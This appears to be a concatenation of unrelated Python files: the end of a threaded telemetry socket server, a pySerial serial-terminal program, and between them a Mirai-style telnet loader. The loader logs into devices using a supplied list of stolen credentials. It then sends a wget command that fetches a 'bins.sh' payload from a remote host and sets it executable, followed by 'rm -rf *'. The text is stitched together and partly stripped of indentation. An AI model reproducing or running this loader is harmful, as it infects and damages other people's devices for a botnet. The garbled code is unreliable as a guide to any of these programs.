    def handle(self):  # on each packet
        """
        The function that is invoked when a packet is received. This function listens
        for data on the socket. Packets for now are assumed to be separated
        by a newline. For each packet, call processPkt.
        """
        # For UDP, self.request is (datagram_bytes, socket); only the
        # payload is needed here.
        self.getNewMsg(self.request[0])

    #################################################
    # New Routines to process the command messages
    #################################################
    def getNewMsg(self, packet):
        """
        After registration wait for an incoming message
        The first part must always be an "A5A5 " or a "List "
        """
        # Read the header data from the socket either A5A5 or List
        (header, packet) = self.readHeader(packet)
        # If the received header is an empty string, connection closed, exit loop
        if not header:
            return
        # Got the header data so read the data of the message here...
        data = self.readData(header, packet)
        # Process and send the packet of the message here...
        self.processNewPkt(header, data)

    def readHeader(self, packet):
        """
        Read the 9 byte header (e.g. "A5A5 GUI " or "A5A5 FSW "),
        or just read the "List\n" command.
        """
        # Split the fixed 9-byte routing header from the payload.
        header = packet[:4]
        header2 = packet[4:9]
        packet = packet[9:]
        return (header + header2, packet)

    def readData(self, header, packet):
        """
        Read the data part of the message sent to either GUI or FSW.
        GUI receives telemetry.
        FSW receives commands of various lengths.
        """
        data = ""
        dst = header.split(b" ")[1].strip(b" ")
        # Read telemetry data here...
        # Frame: 4-byte big-endian size, payload.
        tlm_packet_size = packet[:4]
        size = struct.unpack(">I", tlm_packet_size)[0]
        data = tlm_packet_size + packet[4:4 + size]
        return data

    def processNewPkt(self, header, data):
        """
        Process a single command here header and data here.
        The command must always start with A5A5 except if it is a List.
        Once the entire header string is processed send it on queue.
        If something goes wrong report and shutdown server.
        """
        dest_list = []
        # Process data here...
        head, dst = header.strip(b" ").split(b" ")
        if head == b'A5A5':  # Packet Header
            # print "Received Packet: %s %s...\n" % (head,dst)
            # NOTE(review): data is bytes here, so comparing to the str ''
            # is always False on Python 3 — verify intended check.
            if data == '':
                print(" Data is empty, returning.")
            if b'GUI' in dst:
                dest_list = GUI_clients
            else:
                print("dest? %s" % dst.decode(DATA_ENCODING))
            for dest_elem in dest_list:
                LOCK.acquire()
                if dest_elem in list(SERVER.dest_obj.keys()):
                    # Send the message here....
                    # print "Sending UDP msg to ", dest_elem
                    SERVER.dest_obj[dest_elem].put(data)
                LOCK.release()
        else:
            raise RuntimeError("Telemetry missing A5A5 header")
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    """
    TCP Socket server.

    Keep a dictionary of destination objects containing queues and
    socket id's for writing to destinations.
    """
    # Shared across all handler threads; maps client name -> DestObj.
    dest_obj = dict()
    # Guards dest_obj and the module-level client/id lists.
    lock_obj = threading.Lock()
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
    """
    UDP Socket server.
    """
    # No state of its own; shares SERVER/LOCK globals with the TCP side.
class DestObj:
    """Bookkeeping record for one registered client destination."""

    def __init__(self, name, request):
        """Remember the client's name and its connected socket."""
        self.name = name
        self.socket = request
        self.packet = b""

    def put(self, msg):
        """Write *msg* to the destination socket, reporting (but not
        propagating) socket errors."""
        try:
            # print "about to send data to " + self.name
            self.socket.send(msg)
        except socket.error as err:
            print("Socket error " + str(err.errno) + " occurred on send().")

    def fileno(self):
        """Return the underlying request object.

        NOTE(review): this returns the socket object itself, not a
        numeric descriptor — confirm callers expect that.
        """
        return self.socket
def main(argv=None):
    """Parse options, start the TCP and UDP servers, and block until a
    shutdown is requested (Ctrl-C or a client 'Quit')."""
    global SERVER, LOCK
    program_name = os.path.basename(sys.argv[0])
    program_license = "Copyright 2015 user_name (California Institute of Technology) \
ALL RIGHTS RESERVED. U.S. Government Sponsorship acknowledged."
    program_version = "v0.1"
    program_build_date = "%s" % __updated__
    program_version_string = '%%prog %s (%s)' % (program_version, program_build_date)
    program_longdesc = ''''''  # optional - give further explanation about what the program does
    if argv is None:
        argv = sys.argv[1:]
    try:
        # setup option parser
        parser = OptionParser(version=program_version_string, epilog=program_longdesc, description=program_license)
        parser.add_option("-p", "--port", dest="port", action="store", type="int", help="Set threaded tcp socket server port [default: %default]", \
                          default=50007)
        parser.add_option("-i", "--host", dest="host", action="store", type="string", help="Set threaded tcp socket server ip [default: %default]", \
                          default="127.0.0.1")
        # process options
        (opts, args) = parser.parse_args(argv)
        HOST = opts.host
        PORT = opts.port
        # TCP and UDP servers share the same host/port pair.
        server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
        udp_server = ThreadedUDPServer((HOST, PORT), ThreadedUDPRequestHandler)
        # Hopefully this will allow address reuse and server to restart immediately
        server.allow_reuse_address = True
        # Publish the TCP server and its lock as module globals used by
        # the request handlers.
        SERVER = server
        LOCK = server.lock_obj
        ip, port = server.server_address
        print("TCP Socket Server listening on host addr %s, port %s" % (HOST, PORT))
        # Start a thread with the server -- that thread will then start one
        # more thread for each request
        server_thread = threading.Thread(target=server.serve_forever)
        udp_server_thread = threading.Thread(target=udp_server.serve_forever)
        signal.signal(signal.SIGINT, signal_handler)
        server_thread.daemon = False
        server_thread.start()
        udp_server_thread.daemon = False
        udp_server_thread.start()
        p = os.getpid()
        # print "Process ID: %s" % p
        # Wait with a timeout so the SIGINT handler can run in the main
        # thread and set shutdown_event.
        while not shutdown_event.is_set():
            server_thread.join(timeout=5.0)
            udp_server_thread.join(timeout=5.0)
        print("shutdown from main thread")
        SERVER.shutdown()
        SERVER.server_close()
        udp_server.shutdown()
        udp_server.server_close()
        time.sleep(1)
    except Exception as e:
        indent = len(program_name) * " "
        sys.stderr.write(program_name + ": " + repr(e) + "\n")
        sys.stderr.write(indent + " for help use --help\n")
        return 2


if __name__ == "__main__":
    sys.exit(main())
|
simple_telnet_load.py | #!/usr/bin/python
# Telnet loader | have fun Yo! This Loads Mostly BuZy BoXeS regulr format/Mirai.
# You Can Find Fresh TELNET List To Load @ http://godz56.tk/telnet-list/
# Simple Telnet Loader Ya d1g?
import sys, re, os, socket, time
from multiprocessing import Process
if len(sys.argv) < 2:
sys.exit("\033[37mUsage: python "+sys.argv[0]+" [list]")
cmd="cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://0.0.0.0/bins.sh; chmod 777 bins.sh; rm -rf *" #command to send
info = open(str(sys.argv[1]),'a+')
def readUntil(tn, string, timeout=8):
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(1024)
time.sleep(0.01)
if string in buf: return buf
raise Exception('TIMEOUT!')
def infect(ip,username,password):
ip = str(ip).rstrip("\n")
username = username.rstrip("\n")
password = password.rstrip("\n")
try:
tn = socket.socket()
tn.settimeout(10)
tn.connect((ip,23))
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, "ogin")
if "ogin" in hoho:
tn.send(username + "\n")
time.sleep(0.09)
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, "assword:")
if "assword" in hoho:
tn.send(password + "\n")
time.sleep(0.8)
else:
pass
except Exception:
tn.close()
try:
prompt = ''
prompt += tn.recv(40960)
if ">" in prompt and "ONT" not in prompt:
try:
success = False
tn.send("cat | sh" + "\n")
time.sleep(0.1)
timeout = 8
data = ["BusyBox", "Built-in"]
tn.send("sh" + "\n")
time.sleep(0.01)
tn.send("busybox" + "\r\n")
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(40960)
time.sleep(0.01)
for info in data:
if info in buf and "unrecognized" not in buf:
success = True
break
except:
pass
elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:
try:
success = False
timeout = 8
data = ["BusyBox", "Built-in"]
tn.send("sh" + "\n")
time.sleep(0.01)
tn.send("shell" + "\n")
time.sleep(0.01)
tn.send("help" + "\n")
time.sleep(0.01)
tn.send("busybox" + "\r\n")
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(40960)
time.sleep(0.01)
for info in data:
if info in buf and "unrecognized" not in buf:
success = True
break
except:
pass
else:
tn.close()
if success == True:
try:
tn.send(cmd + "\n")
print "\033[32m[\033[31m+\033[32m] \033[33mCommand Sent!\033[32m %s"%(ip)
time.sleep(20)
tn.close()
except:
tn.close()
tn.close()
except Exception:
tn.close()
for x in info:
try:
if ":23 " in x:
x = x.replace(":23 ", ":")
xinfo = x.split(":")
session = Process(target=infect, args=(xinfo[0].rstrip("\n"),xinfo[1].rstrip("\n"),xinfo[2].rstrip("\n"),))
session.start()
ip=xinfo[0]
username=xinfo[1]
password=xinfo[2]
time.sleep(0.01)
except:
pass
session.join() |
miniterm.py | #!/home/aakanksha/Blockchain-ERP-interoperability/odoo-13.0/venv/bin/python
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
# Register pySerial's 'hexlify' codec so it can be selected like any
# other encoding (used for hex-dump style I/O).
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)

# Python 2/3 compatibility aliases.
try:
    raw_input
except NameError:
    # pylint: disable=redefined-builtin,invalid-name
    raw_input = input  # in python3 it's "raw"
    unichr = chr
def key_description(character):
    """generate a readable description for a key"""
    code = ord(character)
    # Control characters (0..31) render as Ctrl+<letter>: '@' is chr(64),
    # so chr(1) -> 'Ctrl+A', chr(10) -> 'Ctrl+J', etc.
    if code < 32:
        return 'Ctrl+{:c}'.format(ord('@') + code)
    return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
    """OS abstraction for console (input/output codec, no echo)"""

    def __init__(self):
        # On Python 3 raw bytes must go through the underlying buffer;
        # on Python 2 stdout accepts bytes directly.
        if sys.version_info >= (3, 0):
            self.byte_output = sys.stdout.buffer
        else:
            self.byte_output = sys.stdout
        self.output = sys.stdout

    def setup(self):
        """Set console to read single characters, no echo"""

    def cleanup(self):
        """Restore default console settings"""

    def getkey(self):
        """Read a single key from the console"""
        return None

    def write_bytes(self, byte_string):
        """Write bytes (already encoded)"""
        stream = self.byte_output
        stream.write(byte_string)
        stream.flush()

    def write(self, text):
        """Write string"""
        stream = self.output
        stream.write(text)
        stream.flush()

    def cancel(self):
        """Cancel getkey operation"""

    # Context manager protocol: temporarily restore the normal terminal
    # mode (e.g. to prompt the user), re-enabling raw mode on exit.
    def __enter__(self):
        self.cleanup()
        return self

    def __exit__(self, *args, **kwargs):
        self.setup()
# Select a platform-specific Console implementation at import time.
if os.name == 'nt':  # noqa
    import msvcrt
    import ctypes

    class Out(object):
        """file-like wrapper that uses os.write"""

        def __init__(self, fd):
            self.fd = fd

        def flush(self):
            pass

        def write(self, s):
            os.write(self.fd, s)

    class Console(ConsoleBase):
        def __init__(self):
            super(Console, self).__init__()
            # Remember the original console code pages, then switch the
            # console to UTF-8 (code page 65001).
            self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
            self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
            ctypes.windll.kernel32.SetConsoleOutputCP(65001)
            ctypes.windll.kernel32.SetConsoleCP(65001)
            self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
            # the change of the code page is not propagated to Python, manually fix it
            sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
            sys.stdout = self.output
            self.output.encoding = 'UTF-8'  # needed for input

        def __del__(self):
            # Restore the saved console code pages.
            ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
            ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)

        def getkey(self):
            while True:
                z = msvcrt.getwch()
                if z == unichr(13):
                    # Normalize ENTER (CR) to LF.
                    return unichr(10)
                elif z in (unichr(0), unichr(0x0e)):  # functions keys, ignore
                    msvcrt.getwch()
                else:
                    return z

        def cancel(self):
            # CancelIo, CancelSynchronousIo do not seem to work when using
            # getwch, so instead, send a key to the window with the console
            hwnd = ctypes.windll.kernel32.GetConsoleWindow()
            ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)

elif os.name == 'posix':
    import atexit
    import termios
    import fcntl

    class Console(ConsoleBase):
        def __init__(self):
            super(Console, self).__init__()
            self.fd = sys.stdin.fileno()
            # Save the current tty attributes so cleanup() can restore them.
            self.old = termios.tcgetattr(self.fd)
            atexit.register(self.cleanup)
            if sys.version_info < (3, 0):
                self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
            else:
                self.enc_stdin = sys.stdin

        def setup(self):
            # Raw-ish mode: no canonical buffering, no echo, no signals;
            # block for exactly one character.
            new = termios.tcgetattr(self.fd)
            new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
            new[6][termios.VMIN] = 1
            new[6][termios.VTIME] = 0
            termios.tcsetattr(self.fd, termios.TCSANOW, new)

        def getkey(self):
            c = self.enc_stdin.read(1)
            if c == unichr(0x7f):
                c = unichr(8)  # map the BS key (which yields DEL) to backspace
            return c

        def cancel(self):
            # Inject a NUL byte into the tty input queue to unblock read().
            fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')

        def cleanup(self):
            termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)

else:
    raise NotImplementedError(
        'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
    """do-nothing: forward all data unchanged"""

    def rx(self, text):
        """Data arriving from the serial port; passed through untouched."""
        return text

    def tx(self, text):
        """Data headed to the serial port; passed through untouched."""
        return text

    def echo(self, text):
        """Local echo of transmitted data; passed through untouched."""
        return text
class CRLF(Transform):
    """ENTER sends CR+LF"""

    def tx(self, text):
        # Expand each newline into a carriage-return + line-feed pair.
        return text.replace('\n', '\r\n')
class CR(Transform):
    """ENTER sends CR"""

    def rx(self, text):
        # Incoming carriage returns become newlines for display.
        return text.replace('\r', '\n')

    def tx(self, text):
        # Outgoing newlines become carriage returns on the wire.
        return text.replace('\n', '\r')
class LF(Transform):
    """ENTER sends LF"""
    # Inherits the identity transforms: '\n' is already the wire format.
class NoTerminal(Transform):
    """remove typical terminal control codes from input"""

    # Map each C0 control character (except CR/LF/BS/TAB) to its Unicode
    # "control picture" (U+2400 block); DEL and CSI get pictures too.
    REPLACEMENT_MAP = {code: 0x2400 + code
                       for code in range(32)
                       if chr(code) not in '\r\n\b\t'}
    REPLACEMENT_MAP[0x7F] = 0x2421  # DEL
    REPLACEMENT_MAP[0x9B] = 0x2425  # CSI

    def rx(self, text):
        return text.translate(self.REPLACEMENT_MAP)

    echo = rx
class NoControls(NoTerminal):
    """Remove all control codes, incl. CR+LF"""

    # Picture every C0 control character, plus visible-space, DEL, CSI.
    REPLACEMENT_MAP = {code: 0x2400 + code for code in range(32)}
    REPLACEMENT_MAP.update({
        0x20: 0x2423,  # visual space
        0x7F: 0x2421,  # DEL
        0x9B: 0x2425,  # CSI
    })
class Printable(Transform):
    """Show decimal code for all non-ASCII characters and replace most control codes"""

    def rx(self, text):
        out = []
        for ch in text:
            if ' ' <= ch < '\x7f' or ch in '\r\n\b\t':
                # Plain printable ASCII (plus common whitespace) passes through.
                out.append(ch)
            elif ch < ' ':
                # Other control characters become control pictures (U+2400+).
                out.append(chr(0x2400 + ord(ch)))
            else:
                # Non-ASCII: spell the code point in subscript digits, then a space.
                out.extend(chr(0x2080 + ord(digit) - 48)
                           for digit in '{:d}'.format(ord(ch)))
                out.append(' ')
        return ''.join(out)

    echo = rx
class Colorize(Transform):
    """Apply different colors for received and echo"""

    def __init__(self):
        # XXX make it configurable, use colorama?
        self.input_color = '\x1b[37m'  # white for incoming data
        self.echo_color = '\x1b[31m'   # red for local echo

    def rx(self, text):
        return self.input_color + text

    def echo(self, text):
        return self.echo_color + text
class DebugIO(Transform):
    """Print what is sent and received"""

    def _trace(self, tag, text):
        # Emit a tagged repr of the traffic on stderr, then pass it on.
        sys.stderr.write(' [{}:{}] '.format(tag, repr(text)))
        sys.stderr.flush()
        return text

    def rx(self, text):
        return self._trace('RX', text)

    def tx(self, text):
        return self._trace('TX', text)
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character

# Maps --eol option values to their Transform classes.
EOL_TRANSFORMATIONS = {
    'crlf': CRLF,
    'cr': CR,
    'lf': LF,
}

# Maps --filter option values to their Transform classes.
TRANSFORMATIONS = {
    'direct': Transform,  # no transformation
    'default': NoTerminal,
    'nocontrol': NoControls,
    'printable': Printable,
    'colorize': Colorize,
    'debug': DebugIO,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
    """\
    Show a list of ports and ask the user for a choice. To make selection
    easier on systems with long device names, also allow the input of an
    index.
    """
    sys.stderr.write('\n--- Available ports:\n')
    ports = []
    # hwid is unused; only port name and description are shown.
    for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
        sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
        ports.append(port)
    while True:
        port = raw_input('--- Enter port index or full name: ')
        try:
            index = int(port) - 1
            if not 0 <= index < len(ports):
                sys.stderr.write('--- Invalid index!\n')
                continue
        except ValueError:
            # Not a number: treat the input as a literal port name.
            pass
        else:
            port = ports[index]
        return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
    self.console = Console()            # platform console abstraction
    self.serial = serial_instance       # open serial port (serial.Serial-like)
    self.echo = echo                    # local echo of typed characters
    self.raw = False                    # True: pass received bytes unfiltered
    self.input_encoding = 'UTF-8'
    self.output_encoding = 'UTF-8'
    self.eol = eol                      # key into EOL_TRANSFORMATIONS
    self.filters = filters              # keys into TRANSFORMATIONS
    self.update_transformations()
    self.exit_character = 0x1d  # GS/CTRL+]
    self.menu_character = 0x14  # Menu: CTRL+T
    self.alive = None                   # worker threads run while True
    self._reader_alive = None           # reader thread run flag
    self.receiver_thread = None
    self.rx_decoder = None
    self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
    """start worker threads"""
    self.alive = True
    self._start_reader()
    # enter console->serial loop
    self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
    self.transmitter_thread.daemon = True
    self.transmitter_thread.start()
    # Put the console into single-character, no-echo mode.
    self.console.setup()
def stop(self):
    """set flag to stop worker threads"""
    # Both reader and writer loops poll self.alive.
    self.alive = False
def join(self, transmit_only=False):
    """wait for worker threads to terminate"""
    self.transmitter_thread.join()
    if transmit_only:
        return
    # Also wind down the reader, unblocking any pending serial read.
    if hasattr(self.serial, 'cancel_read'):
        self.serial.cancel_read()
    self.receiver_thread.join()
def close(self):
    # Release the serial port.
    self.serial.close()
def update_transformations(self):
    """take list of transformation classes and instantiate them for rx and tx"""
    classes = [EOL_TRANSFORMATIONS[self.eol]]
    classes.extend(TRANSFORMATIONS[f] for f in self.filters)
    self.tx_transformations = [cls() for cls in classes]
    # rx applies the same transforms, but in reverse order.
    self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
    """set encoding for received data"""
    # An incremental decoder handles multi-byte sequences that are
    # split across reads.
    self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
    self.input_encoding = encoding
def set_tx_encoding(self, encoding, errors='replace'):
    """set encoding for transmitted data"""
    # Incremental encoder mirrors set_rx_encoding's decoder.
    self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
    self.output_encoding = encoding
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
    def reader(self):
        """Loop and copy serial->console.

        Runs in the background 'rx' thread until stop is requested or the
        port dies; a SerialException aborts the whole application.
        """
        try:
            while self.alive and self._reader_alive:
                # read all that is there or wait for one byte
                data = self.serial.read(self.serial.in_waiting or 1)
                if data:
                    if self.raw:
                        # raw mode: bytes pass through untouched
                        self.console.write_bytes(data)
                    else:
                        # incremental decoder keeps state for multi-byte
                        # sequences split across read() calls
                        text = self.rx_decoder.decode(data)
                        for transformation in self.rx_transformations:
                            text = transformation.rx(text)
                        self.console.write(text)
        except serial.SerialException:
            # port vanished (e.g. USB unplug): stop everything and unblock
            # the console so the writer thread can exit too
            self.alive = False
            self.console.cancel()
            raise  # XXX handle instead of re-raise?
    def writer(self):
        """\
        Loop and copy console->serial until self.exit_character character is
        found. When self.menu_character is found, interpret the next key
        locally.
        """
        menu_active = False
        try:
            while self.alive:
                try:
                    c = self.console.getkey()
                except KeyboardInterrupt:
                    # treat CTRL+C in the console like a literal ^C byte
                    c = '\x03'
                if not self.alive:
                    break
                if menu_active:
                    # previous key was the menu character: dispatch this one
                    self.handle_menu_key(c)
                    menu_active = False
                elif c == self.menu_character:
                    menu_active = True  # next char will be for menu
                elif c == self.exit_character:
                    self.stop()  # exit app
                    break
                else:
                    #~ if self.raw:
                    text = c
                    for transformation in self.tx_transformations:
                        text = transformation.tx(text)
                    self.serial.write(self.tx_encoder.encode(text))
                    if self.echo:
                        # local echo runs the echo() hook, not tx()
                        echo_text = c
                        for transformation in self.tx_transformations:
                            echo_text = transformation.echo(echo_text)
                        self.console.write(echo_text)
        except:
            # any failure here must take the application down; re-raise so
            # the error is reported
            self.alive = False
            raise
    def handle_menu_key(self, c):
        """Implement a simple menu / settings.

        *c* is the single key typed after the menu character; it falls
        through the hotkey chain below.
        """
        if c == self.menu_character or c == self.exit_character:
            # Menu/exit character again -> send itself
            self.serial.write(self.tx_encoder.encode(c))
            if self.echo:
                self.console.write(c)
        elif c == '\x15':  # CTRL+U -> upload file
            self.upload_file()
        elif c in '\x08hH?':  # CTRL+H, h, H, ? -> Show help
            sys.stderr.write(self.get_help_text())
        elif c == '\x12':  # CTRL+R -> Toggle RTS
            self.serial.rts = not self.serial.rts
            sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
        elif c == '\x04':  # CTRL+D -> Toggle DTR
            self.serial.dtr = not self.serial.dtr
            sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
        elif c == '\x02':  # CTRL+B -> toggle BREAK condition
            self.serial.break_condition = not self.serial.break_condition
            sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
        elif c == '\x05':  # CTRL+E -> toggle local echo
            self.echo = not self.echo
            sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
        elif c == '\x06':  # CTRL+F -> edit filters
            self.change_filter()
        elif c == '\x0c':  # CTRL+L -> EOL mode
            # cycle through the EOL modes in declaration order
            modes = list(EOL_TRANSFORMATIONS)  # keys
            eol = modes.index(self.eol) + 1
            if eol >= len(modes):
                eol = 0
            self.eol = modes[eol]
            sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
            self.update_transformations()
        elif c == '\x01':  # CTRL+A -> set encoding
            self.change_encoding()
        elif c == '\x09':  # CTRL+I -> info
            self.dump_port_settings()
        #~ elif c == '\x01': # CTRL+A -> cycle escape mode
        #~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
        elif c in 'pP':  # P -> change port
            self.change_port()
        elif c in 'sS':  # S -> suspend / open port temporarily
            self.suspend_port()
        elif c in 'bB':  # B -> change baudrate
            self.change_baudrate()
        elif c == '8':  # 8 -> change to 8 bits
            self.serial.bytesize = serial.EIGHTBITS
            self.dump_port_settings()
        elif c == '7':  # 7 -> change to 7 bits
            self.serial.bytesize = serial.SEVENBITS
            self.dump_port_settings()
        elif c in 'eE':  # E -> change to even parity
            self.serial.parity = serial.PARITY_EVEN
            self.dump_port_settings()
        elif c in 'oO':  # O -> change to odd parity
            self.serial.parity = serial.PARITY_ODD
            self.dump_port_settings()
        elif c in 'mM':  # M -> change to mark parity
            self.serial.parity = serial.PARITY_MARK
            self.dump_port_settings()
        # NOTE(review): unreachable — 'sS' is consumed by the suspend_port
        # branch above, so space parity can never be selected even though
        # the help text advertises it; needs a different hotkey.
        elif c in 'sS':  # S -> change to space parity
            self.serial.parity = serial.PARITY_SPACE
            self.dump_port_settings()
        elif c in 'nN':  # N -> change to no parity
            self.serial.parity = serial.PARITY_NONE
            self.dump_port_settings()
        elif c == '1':  # 1 -> change to 1 stop bits
            self.serial.stopbits = serial.STOPBITS_ONE
            self.dump_port_settings()
        elif c == '2':  # 2 -> change to 2 stop bits
            self.serial.stopbits = serial.STOPBITS_TWO
            self.dump_port_settings()
        elif c == '3':  # 3 -> change to 1.5 stop bits
            self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
            self.dump_port_settings()
        elif c in 'xX':  # X -> change software flow control
            self.serial.xonxoff = (c == 'X')
            self.dump_port_settings()
        elif c in 'rR':  # R -> change hardware flow control
            self.serial.rtscts = (c == 'R')
            self.dump_port_settings()
        else:
            sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
    def upload_file(self):
        """Ask user for filename and send its contents over the port."""
        sys.stderr.write('\n--- File to upload: ')
        sys.stderr.flush()
        with self.console:
            # console is suspended so the prompt/readline use a cooked tty
            filename = sys.stdin.readline().rstrip('\r\n')
            if filename:
                try:
                    with open(filename, 'rb') as f:
                        sys.stderr.write('--- Sending file {} ---\n'.format(filename))
                        while True:
                            block = f.read(1024)
                            if not block:
                                break
                            self.serial.write(block)
                            # Wait for output buffer to drain.
                            self.serial.flush()
                            sys.stderr.write('.')  # Progress indicator.
                    sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
                except IOError as e:
                    sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
    def suspend_port(self):
        """\
        open port temporarily, allow reconnect, exit and port change to get
        out of the loop
        """
        # reader thread needs to be shut down
        self._stop_reader()
        self.serial.close()
        sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
        do_change_port = False
        while not self.serial.is_open:
            sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
                exit=key_description(self.exit_character)))
            k = self.console.getkey()
            if k == self.exit_character:
                self.stop()  # exit app
                break
            elif k in 'pP':
                # defer the actual port change until after this loop
                do_change_port = True
                break
